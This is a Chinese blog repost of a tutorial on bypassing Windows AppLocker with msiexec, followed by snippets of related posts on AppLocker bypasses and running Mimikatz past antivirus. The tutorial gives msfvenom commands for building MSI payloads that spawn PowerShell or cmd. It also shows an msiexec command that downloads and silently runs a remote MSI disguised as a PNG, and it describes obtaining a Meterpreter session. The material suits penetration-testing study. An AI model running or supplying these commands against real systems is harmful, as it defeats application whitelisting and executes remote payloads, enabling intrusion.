绕过AppLocker系列之MSIEXEC的利用

最新推荐文章于 2025-08-15 18:50:39 发布
最新推荐文章于 2025-08-15 18:50:39 发布
阅读量198 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 操作系统
原文链接:https://yq.aliyun.com/articles/217162
本文介绍如何利用MSIEXEC工具绕过AppLocker的安全限制,通过生成特殊MSI文件执行PowerShell或Cmd命令,甚至运行MeterpreterPayload,实现权限升级及规避安全策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文讲的是 绕过AppLocker系列之MSIEXEC的利用MSIEXEC是Windows操作系统中的一个实用程序,可用于从命令行安装或配置产品。 如果环境配置不正确,则使用.MSI文件就可以允许攻击者执行权限升级或绕过AppLocker规则。 本文的以下内容表明,当系统配置为不阻止所有用户执行MSI文件时,那么系统就得不到正确的保护,因为任何一个AppLocker的可执行规则都可以轻松绕过。

可以使用Metasploit 的MsfVenom来生成用于执行命令或有效载荷的.MSI文件。

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes

绕过AppLocker系列之MSIEXEC的利用

使用 MsfVenom 生成 MSI 文件 

运行powershell.msi 将会打开一个PowerShell会话,这样就可以绕过AppLocker的规则了,即使已经设置了所有用户都不可以执行PowerShell。

绕过AppLocker系列之MSIEXEC的利用

利用MSIEXEC 运行 PowerShell

同样可以利用这种方式运行cmd命令,即使Windows系统已经阻止了cmd命令的执行。

msiexec /quiet /i cmd.msi

绕过AppLocker系列之MSIEXEC的利用

执行上述命令后,就会弹出cmd的窗口。

绕过AppLocker系列之MSIEXEC的利用

另外,msiexec实用程序还可以运行已经重命名过的MSI文件,比如重命名为PNG的MSI文件。 这些文件可以在命令提示符中本地执行或从远程执行,当然也可以绕过AppLocker规则执行。

msiexec /q /i http://192.168.100.3/tmp/cmd.png

绕过AppLocker系列之MSIEXEC的利用

利用MSIEXEC执行PNG文件,弹出cmd

上述操作同样可以用在Meterpreter payload 执行MSI文件上。

绕过AppLocker系列之MSIEXEC的利用

利用MSI 执行 Meterpreter Payload

绕过AppLocker系列之MSIEXEC的利用

利用MSIEXEC获得Meterpreter 会话




原文发布时间为:2017年6月22日
本文作者:丝绸之路 
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
UltimateAppLockerByPassList:此存储库的目标是记录绕过AppLocker的最常用技术
02-25
由于可以以不同的方式配置AppLocker,因此我维护一个经过验证的绕过列表(适用于默认的AppLocker规则)和一个具有可能的绕过技术的列表(取决于配置),或者声称是某人绕过的列表。 我还列出了通用的绕过技术以及要...
渗透测试中的msiexec
weixin_34357887的博客
09-25 1028
本文讲的是渗透测试中的msiexec, 0x00 前言 在上篇研究了ClickOnce的渗透技巧,接触到了安装包的概念。关于安装包还有一个常见的是msi文件,可在命令行下通过msiexec安装,所以这次就研究一下msiexec在渗透测试中的利用技巧 0x01 简介 msiexec: 系统进程,是Windows Installer的一部分 用于安装Win...
ESET中自带的白利用
Sven的忘却日记
10-10 821
习惯每天早上开机后,清理一下垃圾文件,以及检查开机后的进程列表,清理完垃圾,我在CCleaner启动项管理功能下面,发现了一个ESET杀软的启动项 "C:\Program Files\ESET\ESET Security\ecmds.exe" /launch /hide /proxy 感觉挺有意思,就查看该文件所在目录,结果一眼瞄到了一个callmsi.exe 的文件,运行后,和系统的msiex...
使用msiexec.exe绕过应用程序白名单(多种方法)
weixin_30345577的博客
03-08 699
0x00 前言 在我们之前的文章中,我们讨论了“Windows Applocker策略 - 初学者指南”,因为它们为应用程序控制策略定义了AppLocker规则,以及如何使用它们。但今天您将学习如何绕过AppLocker策略。在本文中,我们使用Windows AppLocker策略阻止了“cmd.exe”文件,并尝试绕过此限制以获得命令提示。 0x01 Applocker适用的关联文件格式...
九种方式运行Mimikatz
子曰小玖的博客
04-29 2773
前言 平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。 下载最新版360: 未经处理的mimikatz直接就被杀了 下面开始进行绕过360抓密码 姿势一-powershell https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-...
AppLocker绕过之路
蚁景网安学院
02-21 1468
前言在提权中我们经常会遇到目标开启了Applocker的情况,本文将以https://github.com/api0cradle/UltimateAppLockerByPassList为...
掌握绕过AppLocker保护的新技术手段
攻击者可能会编写一个DLL文件,利用rundll32.exe来加载执行恶意代码,而这些恶意代码并不直接运行,而是作为合法应用程序的一部分来绕过AppLocker的检测。 这种技术的发现,对于IT安全人员来说是一个警示。它表明...
AppLocker绕过技巧大全:记录最常用技术
资源摘要信息:"UltimateAppLockerByPassList是一个旨在收集并记录绕过AppLocker技术的存储库。AppLocker是Windows操作系统中的一个功能,允许系统管理员控制用户或用户组可以运行哪些应用程序。通过合理配置...
AppLocker绕过技术的终极旁路列表整理
标题和描述中提到的“旁路列表”包含了所有已知的绕过技术,这说明了此资源是一个全面的参考,不仅提供了可能的绕过手段,而且表明这些手段是经过验证的,并且可能与默认的AppLocker规则一起使用。由于AppLocker的...
全面强化AppLocker策略:阻止绕过与安全分析
从标题“AppLocker:AppLocker强化策略”中我们可以看出,主题是关于AppLocker的强化使用,更具体地,是如何构建强大的规则集合以防止已知的AppLocker绕过技术。 描述中提到了构建规则的过程,其中包含了三部分: 1...
应用程序控制策略——AppLocker
weixin_34138139的博客
08-01 472
AppLocker 是一款用于替代软件限制策略功能的全新系统管理工具。存在于 Windows Server 2008 R2 的所有版本以及 Windows 7 旗舰版 和 Windows 7 企业版 中。在 Windows 7 专业版 中,可以创建 AppLocker 规则,但 AppLocker 规则无法在运行 Windows 7 专业版 的计算机上强制执行。 AppLo...
轻量级调试器神器 - mimikatz
Yatere的天平秤
03-08 2939
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下 神器下载地址: mimikatz_trunk.zip 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
鸿蒙应用开发之自定义组件@Component全面解析:自定义组件生命周期
YunWQ的博客
08-14 671
本文介绍了ArkUI中的自定义组件开发,包括其特点、基本结构、成员函数/变量定义及参数传递方式。自定义组件具有可组合、可重用和数据驱动UI更新的特性,通过@Component装饰器定义。文章详细说明了如何在组件中定义成员变量和函数,以及如何接收外部参数。最后简要提及了组件和页面的生命周期函数,包括aboutToAppear、onPageShow等关键回调,为开发者提供了构建可复用UI组件的基础知识。
如何在 Linux 上安装 SQL Server 2022 和 Azure Data Studio
csdn_aspnet的专栏,请点击博客主页右上角三个点中的私信联系
08-15 608
本文介绍了如何在Linux系统(以Ubuntu 20.04为例)上安装SQL Server 2022及Azure Data Studio。SQL Server自2017版开始支持Linux平台,通过平台抽象层实现跨平台兼容性。文章详细说明了安装步骤:导入GPG密钥、注册存储库、安装软件包并配置管理员密码。同时介绍了SQL Server在Linux上的不同版本(企业版、标准版等)和主要功能差异。安装完成后,用户可通过Azure Data Studio等工具进行连接管理,文中提供了连接参数设置指南。整个过程简便
Linux操作系统从入门到实战(二十二)命令行参数与环境变量
最新发布
2402_83322742的博客
08-15 708
本文介绍了Linux中的命令行参数与环境变量。命令行参数通过main函数的argc和argv接收,argc表示参数个数,argv存储具体参数内容,如ls -l中的-l。环境变量是系统全局配置信息,如PATH变量存储可执行文件路径,USER存储用户名。可通过echo $PATH查看或C语言的getenv函数获取环境变量。环境变量与本地变量的区别在于作用范围:环境变量可被子进程继承,而本地变量仅限当前会话。理解这些概念有助于更好地控制程序行为和系统配置。
5G专网项目外场常见业务测试指南(六)-PingInfoView
weixin_45371131的博客
08-12 570
PingInfoView是一款由NirSoft开发的免费网络测试工具,专为5G专网等大规模网络环境设计。该工具可同时对数百个终端设备执行持续Ping测试,实时监测网络延迟和丢包率等关键指标。其特点包括:多目标并行监测、自定义测试参数(间隔、超时、包大小)、结果可视化(颜色区分状态)以及日志导出功能(CSV/HTML格式)。适用于网络管理员进行7*24小时稳定性测试,支持IPv4/IPv6地址,但缺乏数据可视化图表功能。最新3.20版本兼容Windows系统,无需安装即可使用。
Pandas数据处理与分析实战:Pandas数据处理入门-环境搭建与基础配置
WSSWWWSSW的博客
08-12 468
摘要 本课程介绍了Pandas数据处理库的环境设置方法,包括Pandas安装和Jupyter Notebook配置。主要内容有:1)通过pip安装Pandas库并验证安装;2)使用pip安装Jupyter Notebook及基础配置;3)在Jupyter中安装特定版本Pandas的方法。课程适用于Windows、macOS和Linux系统,帮助学员为后续数据处理学习搭建必要的开发环境,推荐使用Python 3.6及以上版本。
看懂 Makefile 第一课:基础
2301_80899620的博客
08-12 978
本文摘要:Makefile是Linux下自动化编译工具,遵循POSIX标准,可替代复杂的命令行操作。文章首先介绍了GCC编译的四个阶段:预处理、编译、汇编和链接,并对比了静态库(.a)和动态库(.so)的特点及使用方法。Makefile包含目标(target)、依赖(prerequisites)和动作(command)三个基本元素,支持文件包含、变量赋值等语法,可通过伪目标(.PHONY)定义纯操作命令。Makefile能显著提高开发效率,是Linux工程管理的重要工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值